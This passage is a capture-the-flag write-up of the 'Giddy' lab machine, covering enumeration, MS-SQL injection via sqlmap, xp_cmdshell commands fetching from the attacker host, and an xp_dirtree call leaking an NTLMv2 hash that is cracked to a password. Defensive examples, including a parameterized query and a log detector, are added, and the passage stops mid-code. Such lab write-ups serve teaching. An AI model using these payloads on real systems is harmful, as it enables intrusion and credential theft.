
Giddy

Giddy is a super cool box that gives real-world practice in bypassing Windows Defender, AppLocker and Constrained Language Mode. It starts with enumeration leading to a site vulnerable to SQL injection on MS-SQL. I’ll abuse the injection to make Giddy open an SMB connection back to me through xp_dirtree, which leaks an NTLMv2 challenge/response that I can crack to get a password for the user Stacy. I’ll use that password with the WinRM service running on Giddy. To get SYSTEM, I’ll exploit a vulnerability in Ubiquiti UniFi Video.

Enumeration

Masscan + Nmap

$ masscan -p1-65535,U:1-65535 `IP` --rate=5000 -e tun0 | tee masscan.out
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Discovered open port 5985/tcp on 10.10.10.104

Pass those ports to nmap:

$ ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
$ nmap -v -sVC --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Issuer: commonName=PowerShellWebAccessTestWebSite
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-06-16T21:28:55
| Not valid after:  2018-09-14T21:28:55
| MD5:   78a7 4af5 3b09 c882 a149 f977 cf8f 1182
|_SHA-1: 8adc 3379 878a f13f 0154 406a 3ead d345 6967 6a23
|_ssl-date: 2021-08-10T16:50:55+00:00; -1s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2021-08-10T16:50:52+00:00
| ssl-cert: Subject: commonName=Giddy
| Issuer: commonName=Giddy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-03T14:56:04
| Not valid after:  2021-11-02T14:56:04
| MD5:   aa42 a9f1 1181 e790 9d59 28dd 7879 5878
|_SHA-1: f5ac fe1b ea5a 81ad a917 c1c2 0087 90a8 1bed 5dc5
|_ssl-date: 2021-08-10T16:50:55+00:00; -1s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Since 3389 is Remote Desktop Protocol and 5985 is Windows Remote Management, I’ll leave those for now.
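As an added example (not part of the original write-up), here is a Python version of the masscan-to-nmap handoff. The awk/sed one-liner above strips both /tcp and /udp and merges everything into one list, so any UDP port masscan found would be handed to nmap as a TCP port; this parser keeps the two apart and emits nmap’s T:/U: port syntax, adding -sS -sU only when UDP ports exist. The masscan output below is constructed, with a UDP line added to show the difference.

```python
import re
from typing import Dict, List

# Constructed masscan output in the same line format as the scan above; the
# UDP line is added here to show why TCP and UDP must be kept apart.
SAMPLE_MASSCAN_OUTPUT = """\
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Discovered open port 5985/tcp on 10.10.10.104
Discovered open port 161/udp on 10.10.10.104
"""

DISCOVERED_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)")


def parse_masscan(output: str) -> Dict[str, Dict[str, List[int]]]:
    """Return {host: {"tcp": [...], "udp": [...]}} with sorted, de-duplicated ports."""
    found: Dict[str, Dict[str, set]] = {}
    for line in output.splitlines():
        m = DISCOVERED_RE.match(line.strip())
        if not m:
            continue  # banner and progress lines carry no port data
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        found.setdefault(host, {"tcp": set(), "udp": set()})[proto].add(port)
    return {h: {p: sorted(v) for p, v in d.items()} for h, d in found.items()}


def nmap_port_spec(ports: Dict[str, List[int]]) -> str:
    """Build an nmap -p value that keeps protocols apart, e.g. T:80,443,U:161."""
    parts = []
    if ports.get("tcp"):
        parts.append("T:" + ",".join(str(p) for p in ports["tcp"]))
    if ports.get("udp"):
        parts.append("U:" + ",".join(str(p) for p in ports["udp"]))
    return ",".join(parts)


def nmap_commands(output: str, base_flags: str = "-v -sVC --min-rate 1000") -> List[str]:
    """One nmap command per host; -sS -sU is added only when UDP ports were found,
    because nmap ignores T: ports when run with -sU alone."""
    cmds = []
    for host, ports in parse_masscan(output).items():
        flags = base_flags + (" -sS -sU" if ports.get("udp") else "")
        cmds.append(f"nmap {flags} -p {nmap_port_spec(ports)} {host} -oN nmap-{host}.out")
    return cmds


if __name__ == "__main__":
    for cmd in nmap_commands(SAMPLE_MASSCAN_OUTPUT):
        print(cmd)
```

Feed it the file saved by `tee masscan.out` and run the printed commands; for a TCP-only result it produces the same scan as the one-liner.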

HTTP/S (80,443)

Banner grabbing on port 80:

$ nc -v giddy.htb 80
giddy.htb [10.10.10.104] 80 (http) open

Port 443:

$ openssl s_client -connect giddy.htb:443
CONNECTED(00000003)
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=66:EE certificate key too weak
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=10:certificate has expired
notAfter=Sep 14 21:28:55 2018 GMT
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
notAfter=Sep 14 21:28:55 2018 GMT
verify return:1
---
Certificate chain
 0 s:CN = PowerShellWebAccessTestWebSite
   i:CN = PowerShellWebAccessTestWebSite
---
Server certificate
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
subject=CN = PowerShellWebAccessTestWebSite

issuer=CN = PowerShellWebAccessTestWebSite

---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 872 bytes and written 394 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: E03E00009192AECBEB4F462B7D6E9AD8FDFC7978F8219775000A3C3120C717BC
    Session-ID-ctx:
    Master-Key: 8823643E99E7EDC8CAD9FBB10FAE8266DA757459F13C60D89BF8DA8B365547F981BCA7F7EAD93FBCCD961EC0A38CF6D6
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1628614816
    Timeout   : 7200 (sec)
    Verify return code: 10 (certificate has expired)
    Extended master secret: yes
---
read:errno=104

Directory brute-forcing with ffuf:

$ ffuf -u http://giddy.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e .txt,.html,.asp,.aspx

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://giddy.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
 :: Extensions       : .txt .html .asp .aspx
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

aspnet_client           [Status: 301, Size: 154, Words: 9, Lines: 2]
.                       [Status: 200, Size: 700, Words: 27, Lines: 32]
remote                  [Status: 302, Size: 157, Words: 6, Lines: 4]
Remote                  [Status: 302, Size: 157, Words: 6, Lines: 4]
Aspnet_client           [Status: 301, Size: 154, Words: 9, Lines: 2]
mvc                     [Status: 301, Size: 144, Words: 9, Lines: 2]

/aspnet_client returns 403 when visited, /remote gives a login page, and /mvc is a browsable site with plenty of functionality.

giddy-1.png

SQL injection on MS-SQL

  • I tried registering, logging in and checking whether the cookies were weak; that didn’t work.
  • Tried SQL injection on the login and register forms; that didn’t work.
  • Tried SQL injection on the search functionality; that worked!

giddy-2.png

Running sqlmap:

$ sqlmap -r req --batch --threads 10 -p 'ctl00$MainContent$SearchTerm'
sqlmap identified the following injection point(s) with a total of 492 HTTP(s) requests:
---
Parameter: ctl00$MainContent$SearchTerm (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=++apU0dzA/DhnZFxzvEphcUipEKPCKz6JNBI7JbP0A344TAIw5EKvC4DcFrkjtlEKkS8lqg0YLKiBjxR3b4zwnnJuAua570S/pnA1sFDLWBsn5ek71qcQ8/Y4YcgWQf3FdPOq5IeeAfRAyU/8hhALHhes9lSe5PivOy9BoPbzwrxT5Hq/zv58i0PsVfK8tMV5TxOfzqgjqqln51Ro1CIB7wNnoVie67UfQCP2jGmNirhcJBajDpW9O4VvNK5E+iOb36wVjxDpmqQD4LVLy3fCjCJ3+AjjsCGVu4LeVw/2+N9zW2h6SJQG0u431PXcCyRkKEMKux+uI26kpZ7kymg57eHbd2wPDrGtJOw9OZ4QKdZEb/EDUla9t37beTsx6gXT9wHdwlN+BMuVSCvgKQF58N1TvJgxkbH2sS8R89Aq0NVPHCfhxHH/Q+zBBwKqpQW8s9REyESJZ+SdLLZEUCOZKFii5B/sJewLU8MFH/3nMuje+rP6zefkzruIT0pUMrliGE7EBiKmrbQscjJZ6N8ZqkSjCDNVMuZ3z4rEAKkv74=&__VIEWSTATEGENERATOR=7DDB321F&__EVENTVALIDATION=XFZH5uNbiCOXA1WF2jvUn27EwXr1phpfomQ4ZdIJVmTwl8LhczAHqXKXIrzHpj0xc/7tnrnyaTXWaYNoRpZ4zzOiBqb2PKN+TOS912S7R52cKoSI5MySJLc/sM1bauU3ABH+TCiN4VbMdN5q2BISUkpqaU/h/ylBcSINV7fRv8w=&ctl00$MainContent$SearchTerm=hello';WAITFOR DELAY '0:0:5'--&ctl00$MainContent$Button1=Search

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__VIEWSTATEGENERATOR=7DDB321F&__EVENTVALIDATION=XFZH5uNbiCOXA1WF2jvUn27EwXr1phpfomQ4ZdIJVmTwl8LhczAHqXKXIrzHpj0xc/7tnrnyaTXWaYNoRpZ4zzOiBqb2PKN+TOS912S7R52cKoSI5MySJLc/sM1bauU3ABH+TCiN4VbMdN5q2BISUkpqaU/h/ylBcSINV7fRv8w=&ctl00$MainContent$SearchTerm=hello' WAITFOR DELAY '0:0:5'-- Xxky&ctl00$MainContent$Button1=Search
---

But here sqlmap wasn’t able to identify the database. I found another injectable endpoint, http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8, which is the product page linked from the homepage.

giddy-3.png

Running sqlmap on it:

$ sqlmap -u http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8 -p ProductSubCategoryId --batch --dbs

Parameter: ProductSubCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductSubCategoryId=8 AND 4485=4485

    Type: inline query
    Title: Generic inline queries
    Payload: ProductSubCategoryId=(SELECT CONCAT(CONCAT(CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113),(CASE WHEN (2151=2151) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ProductSubCategoryId=8 AND 1839 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1839=1839) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ProductSubCategoryId=8;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ProductSubCategoryId=8 WAITFOR DELAY '0:0:5'

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: ProductSubCategoryId=8 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(117)+CHAR(71)+CHAR(97)+CHAR(109)+CHAR(88)+CHAR(116)+CHAR(87)+CHAR(117)+CHAR(111)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(84)+CHAR(76)+CHAR(101)+CHAR(70)+CHAR(120)+CHAR(66)+CHAR(102)+CHAR(79)+CHAR(86)+CHAR(80)+CHAR(83)+CHAR(118)+CHAR(78)+CHAR(78)+CHAR(105)+CHAR(87)+CHAR(105)+CHAR(85)+CHAR(74)+CHAR(111)+CHAR(88)+CHAR(115)+CHAR(108)+CHAR(69)+CHAR(75)+CHAR(104)+CHAR(65)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KJQS
---
[18:36:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2019
web application technology: ASP.NET, Microsoft IIS 10.0, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2016
[18:36:51] [INFO] fetching database names
available databases [5]:
[*] Injection
[*] master
[*] model
[*] msdb
[*] tempdb

[18:36:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/giddy.htb'

[*] ending @ 18:36:51 /2021-08-11/
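To show what the ProductSubCategoryId finding means in code, here is an added example (not the box’s actual ASP.NET code) using an in-memory SQLite stand-in for the Injection database. The vulnerable handler builds the query by string formatting, which is exactly why sqlmap’s `8 AND 4485=4485` probe changes the result set; the hardened handler validates the type and binds a parameter. SQLite’s `execute` runs a single statement, so the stacked `;WAITFOR DELAY` payloads cannot be reproduced here and only the boolean-based variant is shown. The table and its rows are made up.

```python
import sqlite3
from typing import List, Tuple


def build_catalogue() -> sqlite3.Connection:
    """Constructed stand-in for the Injection database's product table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Product (ProductId INTEGER, Name TEXT, ProductSubCategoryId INTEGER);
        INSERT INTO Product VALUES (1, 'Mountain Bike', 8);
        INSERT INTO Product VALUES (2, 'Road Bike', 8);
        INSERT INTO Product VALUES (3, 'Helmet', 31);
        INSERT INTO Product VALUES (4, 'Gloves', 20);
    """)
    return conn


def products_vulnerable(conn: sqlite3.Connection, subcategory_id: str) -> List[Tuple[int, str]]:
    """Query text is assembled from the raw request parameter, so the parameter
    can rewrite the WHERE clause ("8 AND 4485=4485", "8 OR 1=1", ...)."""
    sql = f"SELECT ProductId, Name FROM Product WHERE ProductSubCategoryId = {subcategory_id}"
    return conn.execute(sql).fetchall()


def products_safe(conn: sqlite3.Connection, subcategory_id: str) -> List[Tuple[int, str]]:
    """Validate the type first, then bind it as a parameter; the value is
    never parsed as SQL, whatever it contains."""
    try:
        sub_id = int(subcategory_id)
    except ValueError:
        raise ValueError("ProductSubCategoryId must be an integer") from None
    sql = "SELECT ProductId, Name FROM Product WHERE ProductSubCategoryId = ?"
    return conn.execute(sql, (sub_id,)).fetchall()


def safe_rejects(conn: sqlite3.Connection, value: str) -> bool:
    """True when the hardened handler refuses the input instead of running it."""
    try:
        products_safe(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_catalogue()
    for probe in ("8", "8 AND 4485=4485", "8 AND 4485=4486", "8 OR 1=1"):
        print(f"vulnerable {probe!r:20} -> {len(products_vulnerable(db, probe))} rows")
        outcome = "rejected" if safe_rejects(db, probe) else f"{len(products_safe(db, probe))} rows"
        print(f"safe       {probe!r:20} -> {outcome}")
```

The true/false pair (`4485=4485` versus `4485=4486`) returning two rows and then none is the boolean oracle sqlmap reported; with the parameterized handler every non-integer probe is refused before it reaches the database.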

Dumping databases

  • The msdb backup tables show a backup file at C:\\tmp\\Injection.bak.
    Database: msdb
    Table: backupfile
    [2 entries]
    +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+
    | file_guid                            | backup_set_id | filegroup_guid                       | differential_base_guid | state | drop_lsn | file_size | file_type | page_size | create_lsn | is_present | state_desc | backup_size | file_number | is_readonly | logical_name            | physical_name                                                                             | read_only_lsn | filegroup_name | physical_drive | read_write_lsn | first_media_number | first_family_number | backed_up_page_count | differential_base_lsn | source_file_block_size |
    +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+
    | 40FA46CD-DFA9-40E1-90E5-5BE7CA6783EA | 1             | 00000000-0000-0000-0000-000000000000 | NULL                   | NULL  | NULL     | 214958080 | D         | 8192      | NULL       | True       | ONLINE     | 9043968     | 1           | NULL        | AdventureWorks2012_Data | C:\\Program Files\\Microsoft SQL Server\\MSSQL13.SQLEXPRESS\\MSSQL\\DATA\\\\Injection.mdf | NULL          | PRIMARY        | C:\\           | NULL           | 1                  | 1                   | 1104                 | NULL                  | 512                    |
    | E16FAF18-F2EA-4BFB-9B8A-7F30D4F87B84 | 1             | NULL                                 | NULL                   | NULL  | NULL     | 1835008   | L         | NULL      | NULL       | True       | ONLINE     | 30720       | 2           | NULL        | AdventureWorks2012_Log  | C:\\Program Files\\Microsoft SQL Server\\MSSQL13.SQLEXPRESS\\MSSQL\\DATA\\\\Injection.ldf | NULL          | NULL           | C:\\           | NULL           | 1                  | 1                   | 4                    | NULL                  | 512                    |
    +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+
    Database: msdb
    Table: backupmediafamily
    [1 entry]
    +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+
    | media_set_id | media_family_id                      | mirror | device_type | media_count | logical_device_name | physical_block_size | physical_device_name   | family_sequence_number |
    +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+
    | 1            | BC04C265-0000-0000-0000-000000000000 | NULL   | 2           | 1           | NULL                | 512                 | C:\\tmp\\Injection.bak | 1                      |
    +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+
    
  • The Injection database’s __MigrationHistory table holds a base64-encoded blob that decodes to gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT).
    Database: Injection
    Table: __MigrationHistory
    [1 entry]
    +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
    | MigrationId                   | Model                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    | ProductVersion |
    +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
    | 202108111233184_InitialCreate | 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 | 5.0.0.net45    |
    +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
    

Decompressing the blob with gzip (-a for ASCII text mode, -d to decompress, -c to write to stdout) gives an Entity Framework EDMX model. Nothing interesting in it.

$ gzip -adc abc.gzip
<?xml version="1.0" encoding="utf-8"?>
<Edmx Version="3.0" xmlns="http://schemas.microsoft.com/ado/2009/11/edmx">
  <Runtime>
    <ConceptualModels>
      <Schema Namespace="Microsoft.AspNet.Membership.OpenAuth.Data" Alias="Self" p4:UseStrongSpatialTypes="false" xmlns:p4="http://schemas.microsoft.com/ado/2009/02/edm/annotation" xmlns="http://schemas.microsoft.com/ado/2009/11/edm">
        <EntityType Name="OpenAuthUserData">
          <Key>
            <PropertyRef Name="ApplicationName" />
            <PropertyRef Name="MembershipUserName" />
          </Key>
          <Property Name="ApplicationName" Type="String" FixedLength="false" MaxLength="128" Unicode="true" Nullable="false" />
. . . . . . . . 
 . . . . . . . .
. . . . . . . .
  <Designer>
    <Connection>
      <DesignerInfoPropertySet>
        <DesignerProperty Name="MetadataArtifactProcessing" Value="EmbedInOutputAssembly" />
      </DesignerInfoPropertySet>
    </Connection>
    <Options>
      <DesignerInfoPropertySet>
        <DesignerProperty Name="ValidateOnBuild" Value="False" />
        <DesignerProperty Name="CodeGenerationStrategy" Value="None" />
        <DesignerProperty Name="ProcessDependentTemplatesOnSave" Value="False" />
      </DesignerInfoPropertySet>
    </Options>
    <Diagrams />
  </Designer>

Overall got nothing interesting.

xp_dirtree - NTLMv2 Hash leak

sqlmap reported the MS-SQL server as vulnerable to stacked queries (Microsoft SQL Server/Sybase stacked queries), which means I can append additional statements after a semicolon and they will be executed too.

Basic Enumeration

Since I can’t see the output of any query through this injection (it’s blind), I can’t directly read which permissions I have, whether I’m a DBA, and so on.

For reference, checking whether a login is a sysadmin:

-- lists every login; a 1 in the sysadmin column means that login holds the sysadmin role
SELECT name, sysadmin FROM master..syslogins;

Current login’s server-level permissions:

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

xp_cmdshell (FAIL)

  • Let’s jump straight to xp_cmdshell. Payload used: 8;exec xp_cmdshell 'powershell iwr http://10.10.14.6' -- . It didn’t work; maybe xp_cmdshell isn’t enabled.

  • Enabling xp_cmdshell:

    -- this turns on advanced options and is needed to configure xp_cmdshell
    sp_configure 'show advanced options', '1'
    RECONFIGURE
    -- this enables xp_cmdshell
    sp_configure 'xp_cmdshell', '1' 
    RECONFIGURE
    

    Payload used:

    8;exec sp_configure 'show advanced options','1';RECONFIGURE; exec sp_configure 'xp_cmdshell','1';RECONFIGURE; exec xp_cmdshell 'powershell iwr http://10.10.14.6';--
    

    Didn’t work either, so we aren’t a DBA (sysadmin).

xp_dirtree

xp_dirtree lists every folder, subfolder and file under the path you give it. More usefully here, when that path is a UNC path the SQL Server service account authenticates to the share, so its NTLMv2 challenge/response can be captured by an SMB listener I control (impacket-smbserver or Responder, for example). Payload: 8;exec xp_dirtree '\\10.10.14.6';-- URL: http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8;exec%20xp_dirtree%20%27\\10.10.14.6\share\file%27--;

The SMB server received:

$ smbserver.py share .
Impacket v0.9.22.dev1+20200819.170651.b5fa089b - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49720)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:4141414141414141:d1a8bea31d3e8b7daeea4ea8957b541a:010100000000000080dac0875290d701038979ba18ae513300000000010010006800720054004a0043007100670066000200100065004c0077004d005a0045004b004e00030010006800720054004a0043007100670066000400100065004c0077004d005a0045004b004e000700080080dac0875290d701060004000200000008003000300000000000000000000000003000005e123cf532680873906dfa81aa6d95564bb9b1473c76c48a747a17f48fa917990a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000

Cracking the hash with john:

$ john hash -w:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x     (Stacy)
1g 0:00:00:02 DONE (2021-08-12 16:28) 0.3703g/s 995934p/s 995934c/s 995934C/s xabeoild1..x997ptw=
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
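From the defender’s side, every injected statement in this section (the stacked `;exec xp_dirtree` that forced the SMB authentication, the `;exec xp_cmdshell` attempts and sqlmap’s `WAITFOR DELAY` probes) travels in the query string and lands in the IIS W3C logs. The following added example (not part of the original post) parses a constructed IIS log excerpt, URL-decodes cs-uri-query and flags those patterns. The log lines are made up to mirror the requests in this write-up; the time-taken column is kept because a time-based probe also shows up as an unusually slow request.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not a real log from the box): a benign
# request, the xp_dirtree request from this write-up, a stacked xp_cmdshell
# attempt and a WAITFOR DELAY probe. Backslashes are %5C-encoded as a browser sends them.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2021-08-12 16:20:01 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=8 80 - 10.10.14.6 Mozilla/5.0 200 15
2021-08-12 16:20:09 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=8;exec%20xp_dirtree%20%27%5C%5C10.10.14.6%5Cshare%5Cfile%27-- 80 - 10.10.14.6 Mozilla/5.0 200 120
2021-08-12 16:21:30 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=8;exec%20xp_cmdshell%20%27powershell%20iwr%20http://10.10.14.6%27;-- 80 - 10.10.14.6 Mozilla/5.0 500 30
2021-08-12 16:22:02 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=8%20WAITFOR%20DELAY%20%270:0:5%27 80 - 10.10.14.6 sqlmap/1.5 200 5012
"""

# (label, pattern) pairs evaluated against the URL-decoded query string.
SQLI_INDICATORS = [
    ("stacked-xp_dirtree", re.compile(r";\s*exec\s+(master\.\.)?xp_dirtree\b", re.I)),
    ("stacked-xp_cmdshell", re.compile(r";\s*exec\s+(master\.\.)?xp_cmdshell\b", re.I)),
    ("time-based-waitfor", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    # a UNC path inside a query string is the tell-tale of a forced SMB authentication
    ("unc-path", re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")),
]


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Split W3C-format lines into dicts keyed by the names in the #Fields header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def find_sqli(text: str) -> List[Dict[str, str]]:
    """Return one finding per log row whose decoded query matches an indicator."""
    hits: List[Dict[str, str]] = []
    for row in parse_iis_log(text):
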